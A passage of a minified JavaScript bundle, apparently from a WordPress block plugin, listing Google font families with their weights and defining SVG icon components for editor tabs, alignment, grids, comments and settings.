Script",v:[400],f:"handwriting"},{n:"Vina Sans",v:[400],f:"display"},{n:"Waiting for the Sunrise",v:[400],f:"handwriting"},{n:"Wallpoet",v:[400],f:"display"},{n:"Walter Turncoat",v:[400],f:"handwriting"},{n:"Warnes",v:[400],f:"display"},{n:"Water Brush",v:[400],f:"handwriting"},{n:"Waterfall",v:[400],f:"handwriting"},{n:"Wellfleet",v:[400],f:"display"},{n:"Wendy One",v:[400],f:"sans-serif"},{n:"Whisper",v:[400],f:"handwriting"},{n:"WindSong",v:[400,500],f:"handwriting"},{n:"Wire One",v:[400],f:"sans-serif"},{n:"Work Sans",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Wix Madefor Display",v:[400,500,600,700,800],f:"sans-serif"},{n:"Wix Madefor Text",v:[400,"400i",500,"500i",600,"600i",700,"700i",800,"800i"],f:"sans-serif"},{n:"Xanh Mono",v:[400,"400i"],f:"monospace"},{n:"Yaldevi",v:["200","300",400,500,600,700],f:"sans-serif"},{n:"Yanone Kaffeesatz",v:["200","300",400,500,600,700],f:"sans-serif"},{n:"Yantramanav",v:["100","300",400,500,700,900],f:"sans-serif"},{n:"Yatra One",v:[400],f:"display"},{n:"Yellowtail",v:[400],f:"handwriting"},{n:"Yeon Sung",v:[400],f:"display"},{n:"Yeseva One",v:[400],f:"display"},{n:"Yesteryear",v:[400],f:"handwriting"},{n:"Yomogi",v:[400],f:"handwriting"},{n:"Yrsa",v:["300",400,500,600,700,"300i","400i","500i","600i","700i"],f:"serif"},{n:"Yuji Boku",v:[400],f:"serif"},{n:"Yuji Mai",v:[400],f:"serif"},{n:"Yuji Syuku",v:[400],f:"serif"},{n:"Yusei Magic",v:[400],f:"sans-serif"},{n:"Ysabeau",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"ZCOOL KuaiLe",v:[400],f:"sans-serif"},{n:"ZCOOL QingKe HuangYou",v:[400],f:"sans-serif"},{n:"ZCOOL XiaoWei",v:[400],f:"sans-serif"},{n:"Zen Antique",v:[400],f:"serif"},{n:"Zen Antique Soft",v:[400],f:"serif"},{n:"Zen Dots",v:[400],f:"display"},{n:"Zen Kaku Gothic Antique",v:["300",400,500,700,900],f:"sans-serif"},{n:"Zen Kaku Gothic New",v:["300",400,500,700,900],f:"sans-serif"},{n:"Zen Kurenaido",v:[400],f:"sans-serif"},{n:"Zen Loop",v:[400,"400i"],f:"display"},{n:"Zen Maru Gothic",v:["300",400,500,700,900],f:"sans-serif"},{n:"Zen Old Mincho",v:[400,500,600,700,900],f:"serif"},{n:"Zen Tokyo Zoo",v:[400],f:"display"},{n:"Zeyada",v:[400],f:"handwriting"},{n:"Zhi Mang Xing",v:[400],f:"handwriting"},{n:"Zilla Slab",v:["300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"serif"},{n:"Zilla Slab Highlight",v:[400,700],f:"display"}]},7763:(e,t,n)=>{"use strict";n.d(t,{Z:()=>o});var a=n(7294);const r={};r.left=(0,a.createElement)("svg",{width:24,height:24,xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M4 19.8h8.9v-1.5H4v1.5zm8.9-15.6H4v1.5h8.9V4.2zm-8.9 7v1.5h16v-1.5H4z"})),r.center=(0,a.createElement)("svg",{width:24,height:24,xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M16.4 4.2H7.6v1.5h8.9V4.2zM4 11.2v1.5h16v-1.5H4zm3.6 8.6h8.9v-1.5H7.6v1.5z"})),r.right=(0,a.createElement)("svg",{width:24,height:24,xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M11.1 19.8H20v-1.5h-8.9v1.5zm0-15.6v1.5H20V4.2h-8.9zM4 12.8h16v-1.5H4v1.5z"})),r.spacing=(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:24,height:24,fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"#1E1E1E",strokeWidth:"1.5",d:"m10 8-3.3 3.3a1 1 0 0 0 0 1.4L10 16m4-8 3.3 3.3a1 1 0 0 1 0 1.4L14 16m-7.59-4H17.6M20 4v16M4 4v16"})),r.updateLink=(0,a.createElement)("svg",{style:{height:"20px",width:"20px"},xmlns:"http://www.w3.org/2000/svg",width:"20",height:"20",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fill:"#070707",fillRule:"evenodd",d:"M12.95 2.93a5.75 5.75 0 0 1 8.13 8.13v.01l-3 3a5.75 5.75 0 0 1-8.68-.62.75.75 0 0 1 1.2-.9 4.25 4.25 0 0 0 6.41.46l3-3a4.25 4.25 0 0 0-6.02-6l-1.71 1.7a.75.75 0 1 1-1.06-1.06l1.73-1.72Z",clipRule:"evenodd"}),(0,a.createElement)("path",{fill:"#070707",fillRule:"evenodd",d:"M7.99 8.6a5.75 5.75 0 0 1 6.61 1.95.75.75 0 1 1-1.2.9 4.25 4.25 0 0 0-6.41-.46l-3 3a4.25 4.25 0 0 0 6.01 6l1.71-1.7a.75.75 0 0 1 1.06 1.06l-1.72 1.72a5.75 5.75 0 0 1-8.13-8.13l.01-.01 3-3a5.75 5.75 0 0 1 2.06-1.32Z",clipRule:"evenodd"})),r.addSubmenu=(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"16",height:"16",fill:"none",viewBox:"0 0 16 16"},(0,a.createElement)("g",{fill:"#070707",fillRule:"evenodd",clipPath:"url(#a)",clipRule:"evenodd"},(0,a.createElement)("path",{d:"M.17 2C.17.99.99.17 2 .17h12c1.01 0 1.83.82 1.83 1.83v1.33c0 1.02-.82 1.84-1.83 1.84H2A1.83 1.83 0 0 1 .17 3.33V2ZM2 1.17a.83.83 0 0 0-.83.83v1.33c0 .46.37.84.83.84h12c.46 0 .83-.38.83-.84V2a.83.83 0 0 0-.83-.83H2ZM5.5 8c0-1.01.82-1.83 1.83-1.83h5.34c1 0 1.83.82 1.83 1.83v.67c0 1-.82 1.83-1.83 1.83H7.33A1.83 1.83 0 0 1 5.5 8.67V8Zm1.83-.83A.83.83 0 0 0 6.5 8v.67c0 .46.37.83.83.83h5.34c.46 0 .83-.37.83-.83V8a.83.83 0 0 0-.83-.83H7.33ZM5.5 13.33c0-1.01.82-1.83 1.83-1.83h5.34c1 0 1.83.82 1.83 1.83V14c0 1.01-.82 1.83-1.83 1.83H7.33A1.83 1.83 0 0 1 5.5 14v-.67Zm1.83-.83a.83.83 0 0 0-.83.83V14c0 .46.37.83.83.83h5.34c.46 0 .83-.37.83-.83v-.67a.83.83 0 0 0-.83-.83H7.33Z"}),(0,a.createElement)("path",{d:"M2.17 13V4.67h1V13c0 .1.07.17.16.17H6.5v1H3.33c-.64 0-1.16-.53-1.16-1.17Z"}),(0,a.createElement)("path",{d:"M2.17 7.83H6.5v1H2.17v-1Z"})),(0,a.createElement)("defs",null,(0,a.createElement)("clipPath",{id:"a"},(0,a.createElement)("path",{fill:"#fff",d:"M0 0h16v16H0z"})))),r.textTab=(0,a.createElement)("span",{className:"ultp-tab-button"},(0,a.createElement)("svg",{width:24,height:24,viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M4 18V6C4 4.89543 4.89543 4 6 4H14.8639C15.3943 4 15.903 4.21071 16.2781 4.58579L19.4142 7.72191C19.7893 8.09698 20 8.60569 20 9.13612V18C20 19.1046 19.1046 20 18 20H6C4.89543 20 4 19.1046 4 18Z",stroke:"#1E1E1E",strokeWidth:"1.5"}),(0,a.createElement)("path",{d:"M8 15H16",stroke:"#1E1E1E",strokeWidth:"1.5"}),(0,a.createElement)("path",{d:"M8 12H16",stroke:"#1E1E1E",strokeWidth:"1.5"}),(0,a.createElement)("path",{d:"M8 9H14",stroke:"#1E1E1E",strokeWidth:"1.5"})),(0,a.createElement)("span",null,"Text")),r.style=(0,a.createElement)("span",{className:"ultp-tab-button"},(0,a.createElement)("svg",{width:24,height:24,viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M19.9753 10C20.1346 11.5 19.6219 12.5 18.6219 13.5C16.6219 15.5 12.5451 14.2091 11.73 15C10.9148 15.791 11.73 16.8594 12.7008 17.4873C14.2468 18.4873 13.7314 19.9873 12.2453 20.0001C7.69166 20.0391 4 16 4 12C4 7.58197 7.69149 4 12.2453 4C16.7991 4 19.7128 7.52818 19.9753 10Z",stroke:"#1E1E1E",strokeWidth:"1.5"}),(0,a.createElement)("circle",{cx:"16.25",cy:"9.25",r:"1.25",fill:"#1E1E1E"}),(0,a.createElement)("path",{d:"M14 7C14 7.69036 13.4404 8.25 12.75 8.25C12.0596 8.25 11.5 7.69036 11.5 7C11.5 6.30964 12.0596 5.75 12.75 5.75C13.4404 5.75 14 6.30964 14 7Z",fill:"#1E1E1E"}),(0,a.createElement)("path",{d:"M10 8.25C10 8.94036 9.44036 9.5 8.75 9.5C8.05964 9.5 7.5 8.94036 7.5 8.25C7.5 7.55964 8.05964 7 8.75 7C9.44036 7 10 7.55964 10 8.25Z",fill:"#1E1E1E"}),(0,a.createElement)("path",{d:"M8.5 12C8.5 12.6904 7.94036 13.25 7.25 13.25C6.55964 13.25 6 12.6904 6 12C6 11.3096 6.55964 10.75 7.25 10.75C7.94036 10.75 8.5 11.3096 8.5 12Z",fill:"#1E1E1E"})),(0,a.createElement)("span",null,"Style")),r.settings3=(0,a.createElement)("span",{className:"ultp-tab-button"},(0,a.createElement)("svg",{width:"24",height:"24",viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M20.0733 7.98829L19.5027 6.9982C19.02 6.16044 17.9503 5.87144 17.1114 6.35213C16.7121 6.58737 16.2356 6.65411 15.787 6.53764C15.3384 6.42116 14.9546 6.13103 14.7201 5.73123C14.5693 5.47711 14.4882 5.18767 14.4852 4.89218C14.4988 4.41843 14.3201 3.95934 13.9897 3.61951C13.6593 3.27967 13.2055 3.08802 12.7316 3.08821H11.5821C11.1177 3.08821 10.6725 3.27323 10.345 3.60234C10.0175 3.93145 9.83459 4.37752 9.83682 4.84183C9.82306 5.80049 9.04195 6.57039 8.08319 6.57029C7.7877 6.56722 7.49826 6.48617 7.24414 6.33535C6.40523 5.85465 5.33553 6.14366 4.85284 6.98142L4.24033 7.98829C3.75822 8.825 4.04329 9.89403 4.87801 10.3796C5.42059 10.6928 5.75483 11.2718 5.75483 11.8983C5.75483 12.5248 5.42059 13.1037 4.87801 13.417C4.04435 13.8993 3.75897 14.9657 4.24033 15.7999L4.81927 16.7984C5.04543 17.2064 5.42489 17.5076 5.87369 17.6351C6.32248 17.7627 6.8036 17.7061 7.21058 17.478C7.61067 17.2445 8.08743 17.1806 8.5349 17.3003C8.98238 17.4201 9.36347 17.7136 9.59349 18.1157C9.74431 18.3698 9.82536 18.6592 9.82843 18.9547C9.82843 19.9232 10.6136 20.7083 11.5821 20.7083H12.7316C13.6968 20.7083 14.4806 19.9283 14.4852 18.9631C14.4829 18.4973 14.667 18.05 14.9963 17.7206C15.3257 17.3913 15.773 17.2073 16.2388 17.2095C16.5336 17.2174 16.8218 17.2981 17.0779 17.4444C17.9146 17.9265 18.9836 17.6415 19.4692 16.8067L20.0733 15.7999C20.3071 15.3985 20.3713 14.9205 20.2516 14.4717C20.1319 14.0228 19.8382 13.6402 19.4356 13.4086C19.033 13.1769 18.7393 12.7943 18.6196 12.3455C18.4999 11.8967 18.5641 11.4186 18.7979 11.0173C18.95 10.7518 19.1701 10.5317 19.4356 10.3796C20.2653 9.89429 20.5497 8.83151 20.0733 7.99668V7.98829Z",stroke:"#1E1E1E",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M12.1606 14.3147C13.4952 14.3147 14.5771 13.2329 14.5771 11.8983C14.5771 10.5637 13.4952 9.4818 12.1606 9.4818C10.826 9.4818 9.74414 10.5637 9.74414 11.8983C9.74414 13.2329 10.826 14.3147 12.1606 14.3147Z",stroke:"#1E1E1E",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),(0,a.createElement)("span",null,"Settings")),r.add=(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:22,height:24,viewBox:"0 0 22 24",fill:"none"},(0,a.createElement)("g",{clipPath:"url(#clip0_16_9344)"},(0,a.createElement)("path",{d:"M15.7131 0.87241C16.6876 0.87241 17.4896 1.67503 17.4896 2.66957V17.6401C17.4896 18.626 16.6962 19.4373 15.7131 19.4373H2.63896C1.66445 19.4373 0.862407 18.6347 0.862407 17.6401V2.66957C0.862407 1.68375 1.65582 0.87241 2.63896 0.87241H15.7131ZM15.7131 0H2.63896C1.1815 0 0 1.1952 0 2.66957V17.6401C0 19.1145 1.1815 20.3097 2.63896 20.3097H15.7131C17.1705 20.3097 18.352 19.1145 18.352 17.6401V2.66957C18.352 1.1952 17.1705 0 15.7131 0Z",fill:"black"}),(0,a.createElement)("path",{d:"M19.2921 10.2683H11.1337C9.63817 10.2683 8.42578 11.4948 8.42578 13.0077V21.2607C8.42578 22.7736 9.63817 24 11.1337 24H19.2921C20.7877 24 22.0001 22.7736 22.0001 21.2607V13.0077C22.0001 11.4948 20.7877 10.2683 19.2921 10.2683Z",fill:"black"}),(0,a.createElement)("path",{d:"M15.7047 13.9934H14.7129V20.2835H15.7047V13.9934Z",fill:"white"}),(0,a.createElement)("path",{d:"M18.3264 16.6282H12.1084V17.6314H18.3264V16.6282Z",fill:"white"})),(0,a.createElement)("defs",null,(0,a.createElement)("clipPath",{id:"clip0_16_9344"},(0,a.createElement)("rect",{width:22,height:24,fill:"white"})))),r.setting=(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24",role:"img","aria-hidden":"true",focusable:"false"},(0,a.createElement)("path",{d:"M14.5 13.8c-1.1 0-2.1.7-2.4 1.8H4V17h8.1c.3 1 1.3 1.8 2.4 1.8s2.1-.7 2.4-1.8H20v-1.5h-3.1c-.3-1-1.3-1.7-2.4-1.7zM11.9 7c-.3-1-1.3-1.8-2.4-1.8S7.4 6 7.1 7H4v1.5h3.1c.3 1 1.3 1.8 2.4 1.8s2.1-.7 2.4-1.8H20V7h-8.1z"})),r.styleIcon=(0,a.createElement)("svg",{width:24,height:24,viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg",style:{fill:"white"}},(0,a.createElement)("path",{d:"M19.9753 10C20.1346 11.5 19.6219 12.5 18.6219 13.5C16.6219 15.5 12.5451 14.2091 11.73 15C10.9148 15.791 11.73 16.8594 12.7008 17.4873C14.2468 18.4873 13.7314 19.9873 12.2453 20.0001C7.69166 20.0391 4 16 4 12C4 7.58197 7.69149 4 12.2453 4C16.7991 4 19.7128 7.52818 19.9753 10Z",stroke:"#1E1E1E",strokeWidth:"1.5"}),(0,a.createElement)("circle",{cx:"16.25",cy:"9.25",r:"1.25",fill:"#1E1E1E"}),(0,a.createElement)("path",{d:"M14 7C14 7.69036 13.4404 8.25 12.75 8.25C12.0596 8.25 11.5 7.69036 11.5 7C11.5 6.30964 12.0596 5.75 12.75 5.75C13.4404 5.75 14 6.30964 14 7Z",fill:"#1E1E1E"}),(0,a.createElement)("path",{d:"M10 8.25C10 8.94036 9.44036 9.5 8.75 9.5C8.05964 9.5 7.5 8.94036 7.5 8.25C7.5 7.55964 8.05964 7 8.75 7C9.44036 7 10 7.55964 10 8.25Z",fill:"#1E1E1E"}),(0,a.createElement)("path",{d:"M8.5 12C8.5 12.6904 7.94036 13.25 7.25 13.25C6.55964 13.25 6 12.6904 6 12C6 11.3096 6.55964 10.75 7.25 10.75C7.94036 10.75 8.5 11.3096 8.5 12Z",fill:"#1E1E1E"})),r.chatgpt=(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",style:{fill:"#10a37f"},width:"25",height:"25.06",viewBox:"0 0 25 25.06"},(0,a.createElement)("path",{"data-name":"Path 146",d:"M24.795 12.941a6.153 6.153 0 0 0-1.519-2.7A6.07 6.07 0 0 0 22.8 5.1a6.327 6.327 0 0 0-6.88-2.917A6.28 6.28 0 0 0 5.139 4.471 6.223 6.223 0 0 0 .846 7.45a6.137 6.137 0 0 0 .862 7.358 6.07 6.07 0 0 0 .479 5.138 6.281 6.281 0 0 0 6.88 2.91A6.278 6.278 0 0 0 19.851 20.6a6.23 6.23 0 0 0 4.293-2.979 6.092 6.092 0 0 0 .651-4.682m-4.888 5.947v-6.22a.639.639 0 0 0-.285-.621L13.913 8.82l2.061-1.17L20.8 10.4a4.636 4.636 0 0 1 2.209 2.854 4.566 4.566 0 0 1-.475 3.517 4.662 4.662 0 0 1-2.185 1.943c-.146.063-.3.122-.446.178M5.083 6.178v6.2a.624.624 0 0 0 .279.622l5.708 3.226L9.011 17.4l-4.852-2.752a4.639 4.639 0 0 1-2.21-2.854 4.562 4.562 0 0 1 .473-3.514 4.687 4.687 0 0 1 1.784-1.736 4.551 4.551 0 0 1 .877-.367m11.268.023a.714.714 0 0 0-.707 0L9.855 9.5V7.1l4.92-2.748a4.79 4.79 0 0 1 6.485 1.721 4.574 4.574 0 0 1 .616 2.648c-.014.19-.039.393-.07.58zm-3.859 3.47 2.637 1.5v2.756l-2.637 1.457-2.631-1.5v-2.741zM8.8 6.067a.684.684 0 0 0-.3.624v6.4l-2.082-1.137V6.587a1.017 1.017 0 0 0 0-.112 4.75 4.75 0 0 1 7.364-3.911 6.33 6.33 0 0 1 .547.412zm-5.614 9.692 5.448 3.1a.713.713 0 0 0 .707 0l5.8-3.294v2.4l-4.927 2.729a4.79 4.79 0 0 1-6.485-1.713 4.573 4.573 0 0 1-.588-2.917c.013-.1.031-.2.05-.3m13 3.226a.647.647 0 0 0 .3-.627v-6.4l2.07 1.137v5.367a.637.637 0 0 0 0 .112 4.75 4.75 0 0 1-7.441 3.851 7.315 7.315 0 0 1-.467-.356z",transform:"translate(0 .001)"})),r.fs_comment=(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"50",height:"50.003",viewBox:"0 0 50 50.003"},(0,a.createElement)("path",{id:"Path_2150","data-name":"Path 2150",d:"M25,11.6c-21.64,0-25,2.79-25,20.8C0,46.131,1.963,51.017,12.476,52.567V61.6l10.646-8.4c.611.005,1.235.008,1.878.008,21.65,0,25-2.8,25-20.81S46.65,11.6,25,11.6m0,18.04a2.765,2.765,0,1,1-2.76,2.76A2.768,2.768,0,0,1,25,29.642m-9.53,0a2.765,2.765,0,1,1-2.76,2.76,2.768,2.768,0,0,1,2.76-2.76m19.06,5.53A2.765,2.765,0,1,1,37.3,32.4a2.768,2.768,0,0,1-2.77,2.77",transform:"translate(0 -11.602)",fill:"#037FFF"})),r.fs_comment_selected=(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"70",height:"70",viewBox:"0 0 70 70"},(0,a.createElement)("g",{id:"Group_4357","data-name":"Group 4357",transform:"translate(-221.11 2002)"},(0,a.createElement)("path",{id:"Path_2154","data-name":"Path 2154",d:"M172.35,30.8a2.765,2.765,0,1,1-2.77-2.76,2.77,2.77,0,0,1,2.77,2.76",transform:"translate(77 -2002)",fill:"#037FFF"}),(0,a.createElement)("path",{id:"Path_2155","data-name":"Path 2155",d:"M181.88,30.8a2.765,2.765,0,1,1-2.77-2.76,2.77,2.77,0,0,1,2.77,2.76",transform:"translate(77 -2002)",fill:"#037FFF"}),(0,a.createElement)("path",{id:"Path_2156","data-name":"Path 2156",d:"M191.41,30.8a2.765,2.765,0,1,1-2.77-2.76,2.77,2.77,0,0,1,2.77,2.76",transform:"translate(77 -2002)",fill:"#037FFF"}),(0,a.createElement)("path",{id:"Path_2157","data-name":"Path 2157",d:"M204.65,0H153.58a9.468,9.468,0,0,0-9.47,9.46V60.54A9.468,9.468,0,0,0,153.58,70h51.07a9.46,9.46,0,0,0,9.46-9.46V9.46A9.46,9.46,0,0,0,204.65,0M179.11,51.61c-.64,0-1.26,0-1.87-.01L166.59,60V50.96c-10.51-1.55-12.48-6.43-12.48-20.16,0-18.01,3.36-20.8,25-20.8s25,2.79,25,20.8-3.35,20.81-25,20.81",transform:"translate(77 -2002)",fill:"#037FFF"}))),r.fs_suggestion=(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"50.001",height:"49.997",viewBox:"0 0 50.001 49.997"},(0,a.createElement)("g",{id:"Group_4358","data-name":"Group 4358",transform:"translate(-137.503 1994.592)"},(0,a.createElement)("path",{id:"Path_2151","data-name":"Path 2151",d:"M104.722,20.306H89.545V24.08a4.274,4.274,0,0,1-4.267,4.267H76.261a4.218,4.218,0,0,1-1.812-.424,4.272,4.272,0,0,1-4.107,3.166h-6.1V51.623A5.773,5.773,0,0,0,70.021,57.4h34.7a5.78,5.78,0,0,0,5.782-5.782V26.1a5.789,5.789,0,0,0-5.782-5.793M90.13,47.791H76.835a1.692,1.692,0,0,1,0-3.384H90.13a1.692,1.692,0,0,1,0,3.384m7.778-7.915H76.835a1.692,1.692,0,0,1,0-3.384H97.908a1.692,1.692,0,0,1,0,3.384",transform:"translate(77 -2002)",fill:"#037FFF"}),(0,a.createElement)("path",{id:"Path_2152","data-name":"Path 2152",d:"M86.1,24.077V15.065a.827.827,0,0,0-.827-.827H80.619a.827.827,0,0,1-.742-1.193l2.2-4.443a.827.827,0,0,0-.741-1.194h-2a.827.827,0,0,0-.741.461l-3.062,6.2a.83.83,0,0,0-.086.366v9.646a.827.827,0,0,0,.827.827h9.012a.827.827,0,0,0,.827-.827",transform:"translate(77 -2002)",fill:"#037FFF"}),(0,a.createElement)("path",{id:"Path_2153","data-name":"Path 2153",d:"M71.169,26.82V17.808a.827.827,0,0,0-.827-.827H65.684a.827.827,0,0,1-.742-1.193l2.2-4.443a.827.827,0,0,0-.741-1.194H64.392a.827.827,0,0,0-.741.461l-3.062,6.2a.83.83,0,0,0-.086.366V26.82a.827.827,0,0,0,.827.827h9.012a.827.827,0,0,0,.827-.827",transform:"translate(77 -2002)",fill:"#037FFF"}))),r.fs_suggestion_selected=(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"70",height:"70",viewBox:"0 0 70 70"},(0,a.createElement)("path",{id:"Path_2158","data-name":"Path 2158",d:"M329.38,0H278.3a9.46,9.46,0,0,0-9.46,9.46V60.54A9.46,9.46,0,0,0,278.3,70h51.08a9.466,9.466,0,0,0,9.46-9.46V9.46A9.466,9.466,0,0,0,329.38,0M293.77,17.03a.779.779,0,0,1,.09-.37l3.06-6.2a.834.834,0,0,1,.74-.46h2.01a.833.833,0,0,1,.74,1.2l-2.2,4.44a.825.825,0,0,0,.74,1.19h4.66a.828.828,0,0,1,.83.83v9.01a.828.828,0,0,1-.83.83H294.6a.828.828,0,0,1-.83-.83ZM278.84,29.41V19.77a.946.946,0,0,1,.08-.37l3.06-6.19a.82.82,0,0,1,.75-.46h2a.825.825,0,0,1,.74,1.19l-2.19,4.44a.826.826,0,0,0,.74,1.2h4.66a.824.824,0,0,1,.82.82v9.01a.826.826,0,0,1-.82.83h-9.02a.826.826,0,0,1-.82-.83m50,24.81A5.783,5.783,0,0,1,323.06,60H288.35a5.77,5.77,0,0,1-5.78-5.78V33.68h6.11a4.26,4.26,0,0,0,4.1-3.16,4.257,4.257,0,0,0,1.81.42h9.02a4.274,4.274,0,0,0,4.27-4.27V22.9h15.18a5.791,5.791,0,0,1,5.78,5.79Zm-12.6-15.13H295.17a1.69,1.69,0,1,0,0,3.38h21.07a1.69,1.69,0,1,0,0-3.38M308.46,47H295.17a1.7,1.7,0,0,0,0,3.39h13.29a1.7,1.7,0,0,0,0-3.39",transform:"translate(-268.84)",fill:"#037FFF"})),r.grid_col1=(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"22",height:"22",viewBox:"0 0 22 22",fill:"currentColor"},(0,a.createElement)("g",{transform:"translate(-770 -381)"},(0,a.createElement)("rect",{width:"10",height:"10",transform:"translate(770 381)"}),(0,a.createElement)("rect",{width:"10",height:"10",transform:"translate(770 393)"}),(0,a.createElement)("rect",{width:"10",height:"10",transform:"translate(782 381)"}),(0,a.createElement)("rect",{width:"10",height:"10",transform:"translate(782 393)"}))),r.grid_col2=(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"22",height:"22",viewBox:"0 0 22 22",fill:"currentColor"},(0,a.createElement)("g",{transform:"translate(-858 -381)"},(0,a.createElement)("rect",{width:"6",height:"6",transform:"translate(858 381)"}),(0,a.createElement)("rect",{width:"6",height:"6",transform:"translate(858 389)"}),(0,a.createElement)("rect",{width:"6",height:"6",transform:"translate(858 397)"}),(0,a.createElement)("rect",{width:"6",height:"6",transform:"translate(866 381)"}),(0,a.createElement)("rect",{width:"6",height:"6",transform:"translate(866 389)"}),(0,a.createElement)("rect",{width:"6",height:"6",transform:"translate(866 397)"}),(0,a.createElement)("rect",{width:"6",height:"6",transform:"translate(874 381)"}),(0,a.createElement)("rect",{width:"6",height:"6",transform:"translate(874 389)"}),(0,a.createElement)("rect",{width:"6",height:"6",transform:"translate(874 397)"}))),r.grid_col3=(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"22",height:"22",viewBox:"0 0 22 22"},(0,a.createElement)("g",{transform:"translate(-909 -381)"},(0,a.createElement)("rect",{width:"4",height:"4",transform:"translate(909 381)"}),(0,a.createElement)("rect",{width:"4",height:"4",transform:"translate(909 387)"}),(0,a.createElement)("rect",{width:"4",height:"4",transform:"translate(909 393)"}),(0,a.createElement)("rect",{width:"4",height:"4",transform:"translate(909 399)"}),(0,a.createElement)("rect",{width:"4",height:"4",transform:"translate(915 381)"}),(0,a.createElement)("rect",{width:"4",height:"4",transform:"translate(915 387)"}),(0,a.createElement)("rect",{width:"4",height:"4",transform:"translate(915 393)"}),(0,a.createElement)("rect",{width:"4",height:"4",transform:"translate(915 399)"}),(0,a.createElement)("rect",{width:"4",height:"4",transform:"translate(921 381)"}),(0,a.createElement)("rect",{width:"4",height:"4",transform:"translate(921 387)"}),(0,a.createElement)("rect",{width:"4",height:"4",transform:"translate(921 393)"}),(0,a.createElement)("rect",{width:"4",height:"4",transform:"translate(921 399)"}),(0,a.createElement)("rect",{width:"4",height:"4",transform:"translate(927 381)"}),(0,a.createElement)("rect",{width:"4",height:"4",transform:"translate(927 387)"}),(0,a.createElement)("rect",{width:"4",height:"4",transform:"translate(927 393)"}),(0,a.createElement)("rect",{width:"4",height:"4",transform:"translate(927 399)"}))),r.rocketPro=(0,a.createElement)("svg",{width:"16",height:"16",viewBox:"0 0 16 16",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M10.7991 7.20004C9.69681 7.20004 8.7993 6.30253 8.7993 5.20024C8.7993 4.09795 9.69681 3.20044 10.7991 3.20044C11.9014 3.20044 12.7989 4.09795 12.7989 5.20024C12.7989 6.30253 11.9014 7.20004 10.7991 7.20004ZM10.7991 4.00036C10.1376 4.00036 9.59922 4.53871 9.59922 5.20024C9.59922 5.86177 10.1376 6.40012 10.7991 6.40012C11.4606 6.40012 11.999 5.86177 11.999 5.20024C11.999 4.53871 11.4606 4.00036 10.7991 4.00036ZM0.400132 15.9992C0.335857 15.9993 0.272494 15.984 0.215433 15.9544C0.158371 15.9248 0.109297 15.8819 0.0723848 15.8292C0.0354726 15.7766 0.0118133 15.7159 0.00341887 15.6521C-0.00497556 15.5884 0.00214312 15.5236 0.0241696 15.4632C1.25525 12.0788 2.54952 10.3621 3.87019 10.3621C4.30615 10.3621 4.7133 10.5493 5.08207 10.9173C5.66441 11.4996 5.68521 12.0796 5.60042 12.4635C5.33324 13.6698 3.62941 14.8513 0.536919 15.976C0.49303 15.9917 0.446764 15.9998 0.400132 16V15.9992ZM3.87099 11.1612C3.47503 11.1612 3.00867 11.5084 2.52312 12.1651C2.04557 12.8107 1.56562 13.7306 1.09286 14.9065C2.16076 14.4769 3.01907 14.041 3.65181 13.6066C4.50533 13.0203 4.7581 12.5667 4.81969 12.2899C4.88129 12.0132 4.7821 11.7484 4.51652 11.4828C4.30055 11.2668 4.08937 11.162 3.87019 11.162L3.87099 11.1612Z",fill:"white"}),(0,a.createElement)("path",{d:"M15.5986 0.00079992C13.5228 0.00079992 11.6734 0.352765 10.1 1.0471C8.80329 1.61984 7.693 2.42296 6.79949 3.43566C6.63311 3.62444 6.47872 3.81562 6.33554 4.0076C5.64601 4.05319 4.94048 4.32757 4.23655 4.82352C3.64061 5.24268 3.04227 5.82342 2.45673 6.54894C1.47282 7.76802 0.868084 8.9703 0.842486 9.0207C0.800011 9.10558 0.789106 9.2028 0.81172 9.29498C0.834335 9.38716 0.888995 9.4683 0.96593 9.52388C1.04287 9.57947 1.13706 9.60588 1.23168 9.5984C1.3263 9.59092 1.41518 9.55003 1.48242 9.48305C1.48642 9.47905 1.86878 9.10309 2.52072 8.73433C3.05826 8.43036 3.88698 8.07279 4.88928 8.0096C5.14286 8.65833 5.86838 9.43426 6.21635 9.78222C6.56431 10.1302 7.34024 10.8557 7.98897 11.1093C7.92578 12.1116 7.56821 12.9403 7.26425 13.4779C6.89468 14.1306 6.51952 14.5121 6.51632 14.5153C6.45032 14.5828 6.41026 14.6714 6.40318 14.7655C6.3961 14.8596 6.42247 14.9532 6.47763 15.0298C6.5328 15.1064 6.61322 15.1611 6.70473 15.1842C6.79625 15.2073 6.89297 15.1973 6.97787 15.1561C7.02827 15.1305 